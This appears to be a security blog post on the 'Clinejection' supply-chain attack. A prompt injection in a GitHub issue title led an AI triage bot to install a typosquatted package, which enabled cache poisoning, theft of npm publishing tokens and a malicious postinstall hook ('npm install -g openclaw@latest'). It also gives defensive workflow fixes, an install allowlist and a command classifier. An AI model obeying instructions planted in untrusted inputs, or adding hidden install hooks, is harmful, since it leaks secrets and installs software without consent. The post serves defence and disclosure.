An attacker hid a prompt in a GitHub issue title. An AI triage bot read it, interpreted it as an instruction, and handed over the npm token. 4,000 developers got pwned.

This is the story of Clinejection — one of the most creative supply chain attacks we’ve seen in 2026.

The TL;DR

On February 17, 2026, someone published cline@2.3.0 to npm. The CLI binary was byte-identical to the previous version. The only change was one line in package.json:

"postinstall": "npm install -g openclaw@latest"

For eight hours, every developer who installed or updated Cline got OpenClaw — a separate AI agent with full system access — installed on their machine without consent.

The scariest part? The attacker got the npm token by simply opening a GitHub issue with a malicious title.

The Five-Step Attack Chain

Snyk named this attack “Clinejection” because it chains together five well-understood vulnerabilities into one devastating exploit. Let’s break it down:

Step 1: Prompt Injection via Issue Title

Cline used an AI-powered issue triage workflow running Anthropic’s Claude. The workflow was configured to let anyone trigger it by opening an issue:

allowed_non_write_users: "*"

The issue title was passed directly to Claude without sanitization:

${{ github.event.issue.title }}

On January 28, the attacker created Issue #8904. The title looked like a performance report but contained an embedded instruction telling Claude to install a package from a specific GitHub repository.

Lesson: Never interpolate untrusted input directly into AI prompts.
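The standard hardening here, per GitHub's own guidance, is to pass untrusted event fields through an environment variable so they reach the model as data rather than as template text. A minimal sketch (the step name and triage-bot invocation are placeholders, not Cline's actual workflow):

```yaml
- name: Triage issue
  env:
    # The runner sets this variable; the value is never expanded into
    # the script or prompt template itself.
    ISSUE_TITLE: ${{ github.event.issue.title }}
  run: |
    # Hypothetical bot CLI: the title is handed over as quoted data.
    ./triage-bot --title "$ISSUE_TITLE"
```

With `${{ }}` interpolation inside `run:`, a crafted title becomes part of the script; routed through `env:`, it can only ever be a string argument.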

Step 2: AI Bot Executes Arbitrary Code

Claude interpreted the injected instruction as legitimate and ran:

npm install <attacker's-repository>

The repository was a typosquatted fork: glthub-actions/cline (an 'l' standing in for the 'i' in 'github'). Its package.json contained a preinstall script that fetched and executed a remote shell script.

Lesson: AI agents need guardrails. Just because an instruction looks legitimate doesn’t mean it is legitimate.
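One concrete guardrail is to never let the agent run package installs directly, and route them through an allowlist check instead. A minimal sketch, with a hypothetical wrapper and an illustrative allowlist (not Cline's actual code):

```shell
#!/bin/sh
# Illustrative allowlist of packages the agent may install.
ALLOWED="typescript eslint prettier"

is_allowed() {
  pkg="$1"
  for a in $ALLOWED; do
    [ "$pkg" = "$a" ] && return 0
  done
  return 1
}

# Hypothetical wrapper the agent calls instead of npm directly.
guarded_install() {
  if is_allowed "$1"; then
    echo "OK: would run npm install $1"
  else
    echo "BLOCKED: $1 is not on the allowlist" >&2
    return 1
  fi
}

guarded_install typescript
guarded_install glthub-actions/cline || true
```

An allowlist is crude, but it converts "the model decided to install something" from an action into a request a policy can refuse.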

Step 3: Cache Poisoning

The shell script deployed Cacheract, a GitHub Actions cache poisoning tool. Here’s what it did:

  1. Flooded the cache with 10GB+ of junk data
  2. Triggered GitHub’s LRU (Least Recently Used) eviction policy
  3. Evicted legitimate cache entries
  4. Inserted poisoned entries matching Cline’s cache key pattern

When Cline’s nightly release workflow ran, it would restore node_modules from cache — and get the compromised version.

Lesson: GitHub Actions cache is a shared resource. Don’t assume cached data is trustworthy.
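A cheap mitigation is to treat a cache restore as untrusted until proven otherwise: record a fingerprint when the cache is saved and re-check it after restore. A sketch under that assumption (the function names and the fingerprint file are hypothetical, not part of Cline's workflow):

```shell
#!/bin/sh
# Compute the sha256 of a file (e.g. package-lock.json).
fingerprint() {
  sha256sum "$1" | cut -d' ' -f1
}

# Compare the current lockfile fingerprint against the one recorded
# when the cache entry was saved; succeeds only on an exact match.
verify_cache() {
  lockfile="$1"   # e.g. package-lock.json
  saved="$2"      # fingerprint recorded at cache-save time
  [ "$(fingerprint "$lockfile")" = "$saved" ]
}

# Typical CI usage (illustrative):
#   verify_cache package-lock.json "$(cat node_modules/.cache-fingerprint)" \
#     || { rm -rf node_modules; npm ci; }
```

On mismatch, the safe move is to discard the restored directory and rebuild from the registry rather than trust the cache.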

Step 4: Credential Theft

The nightly release workflow held three secrets:

  • NPM_RELEASE_TOKEN — publishes to npm
  • VSCE_PAT — publishes to VS Code Marketplace
  • OVSX_PAT — publishes to OpenVSX

When the workflow restored the poisoned cache, all three tokens were exfiltrated to the attacker’s server.

Lesson: Minimize secrets in CI/CD. Use OIDC tokens instead of long-lived credentials when possible.
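With npm's OIDC-based trusted publishing, the release job mints a short-lived token at run time and no long-lived NPM_RELEASE_TOKEN needs to exist as a repository secret at all. A sketch of the relevant workflow pieces (assumes trusted publishing is already configured for the package on npmjs.com):

```yaml
permissions:
  id-token: write   # lets the job request a short-lived OIDC token
  contents: read

steps:
  - uses: actions/checkout@v4
  - uses: actions/setup-node@v4
    with:
      node-version: 22
      registry-url: https://registry.npmjs.org
  - run: npm ci
  - run: npm publish --provenance --access public
```

A poisoned cache in this setup has nothing durable to steal: the token is scoped to the run and expires with it.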

Step 5: Malicious Publish

Using the stolen npm token, the attacker published cline@2.3.0 with the OpenClaw postinstall hook.

StepSecurity’s automated monitoring flagged the compromised version approximately 14 minutes after publication, but it stayed live on npm for eight hours before it was pulled. By then, ~4,000 developers had installed it.

Lesson: Automated security monitoring catches what humans miss. Use tools like StepSecurity, Socket, or Snyk.

Why Didn’t Existing Security Tools Catch This?

| Tool | Why It Missed |
| --- | --- |
| npm audit | OpenClaw is a legitimate package. No malware to detect. |
| Code review | The binary was identical. Only package.json changed, by one line. |
| Provenance attestations | Cline wasn’t using OIDC-based npm provenance at the time. |
| Permission prompts | postinstall hooks run silently during npm install. No prompt. |

The attack exploited the gap between what developers think they’re installing (a specific version of Cline) and what actually executes (arbitrary lifecycle scripts).
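One way to close that gap is to disable lifecycle scripts by default and opt back in only after review. A project-level sketch via .npmrc:

```ini
# .npmrc — lifecycle scripts (preinstall/postinstall/etc.) off by default
ignore-scripts=true
```

Packages whose install scripts you have reviewed can then be run explicitly, e.g. npm rebuild <pkg> --ignore-scripts=false. Expect some breakage: packages with native addons legitimately depend on their install scripts, so this is a deliberate trade-off, not a free win.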

The Disclosure Timeline Disaster

Here’s where it gets worse:

  • December 2025: Security researcher Adnan Khan discovered the vulnerability
  • January 1, 2026: Khan reported it via GitHub Security Advisory
  • January 1-February 9: Khan sent multiple follow-ups. No response.
  • February 9: Khan publicly disclosed
  • February 9 (30 min later): Cline patched by removing AI triage workflows
  • February 10: Cline began credential rotation
  • February 10-11: Team deleted the wrong token, leaving the exposed one active
  • February 11: Discovered error, re-rotated
  • February 17: Attacker published malicious package using credentials exfiltrated before rotation

The attacker wasn’t Khan. A separate, unknown actor found Khan’s proof-of-concept on his test repository and weaponized it.

Lesson: Vulnerability disclosure requires fast, complete response. Incomplete credential rotation is worse than no rotation — it creates false confidence.

The New Pattern: AI Installs AI

Here’s what makes Clinejection different from typical supply chain attacks:

The payload wasn’t crypto mining or data theft. It was one AI tool silently bootstrapping a second AI agent on developer machines.

This creates a recursion problem:

  1. Developer trusts Tool A (Cline)
  2. Tool A is compromised to install Tool B (OpenClaw)
  3. Tool B has its own capabilities:
    • Shell execution
    • Credential access
    • Persistent daemon installation
    • Full system access

Tool B is invisible to the developer’s original trust decision. They never evaluated it, never configured it, never consented to it.

This is the supply chain equivalent of the confused deputy problem: Cline acts on the developer’s behalf, but delegates that authority to an entirely separate agent.

What You Should Do

If You’re a Developer

  1. Audit your postinstall hooks:

    npm query ":attr(scripts, [postinstall])" | jq
    
  2. Check if you installed Cline between Feb 17-18:

    which openclaw && openclaw --version
    
  3. Verify registry signatures for your installed packages:

    npm audit signatures
    
  4. Consider using lockfile-only installs:

    npm ci  # instead of npm install
    

If You’re Running AI Agents in CI/CD

  1. Never interpolate untrusted input into prompts without sanitization
  2. Restrict who can trigger AI workflows; allowed_non_write_users: "*" is asking for trouble
  3. Use OIDC tokens instead of long-lived secrets
  4. Assume cache is untrusted — verify integrity after restore
  5. Implement operation-level controls — evaluate what the AI does, not just what it says
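Point 5 can start as simply as a classifier that sits between the model and the shell and judges the concrete command, not the model's stated intent. A toy sketch (the patterns are illustrative, nowhere near a complete policy):

```shell
#!/bin/sh
# Classify an agent-proposed command as allow / deny / review.
classify() {
  case "$1" in
    "npm install -g "* | *"| sh"* | *"| bash"*)
      # Global installs and pipe-to-shell are denied outright.
      echo deny ;;
    "npm test" | "npm run lint" | "git status")
      # A small set of known-safe, read-mostly commands.
      echo allow ;;
    *)
      # Anything unrecognized is escalated to a human reviewer.
      echo review ;;
  esac
}
```

The key property: the gate never executes anything it cannot place, so a convincingly worded instruction still has to produce a command the policy accepts.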

If You’re a Project Maintainer

  1. Respond to security disclosures fast — Khan waited 5 weeks
  2. Rotate all credentials when any are exposed — verify the rotation worked
  3. Enable npm provenance — OIDC attestations would have prevented this
  4. Use automation for detection — StepSecurity caught this in 14 minutes

The Bigger Picture

The entry point for this entire attack was natural language in a GitHub issue title.

Not a malicious binary. Not a backdoored dependency. Not a zero-day exploit. Just words.

This is the new threat model for AI-assisted development:

  • AI agents process untrusted input (issues, PRs, comments)
  • AI agents have access to secrets (tokens, keys, credentials)
  • The question is: who evaluates what the AI does with that access?

Right now, for most teams, the answer is “nobody.”

The attack surface isn’t code anymore. It’s conversation.

References

  1. StepSecurity Detection Report
  2. Snyk Clinejection Analysis
  3. Adnan Khan Disclosure Thread
  4. Cline Post-Mortem
  5. Endor Labs Payload Analysis

Got questions about prompt injection or AI security? Drop them in the comments or hit us up on Twitter.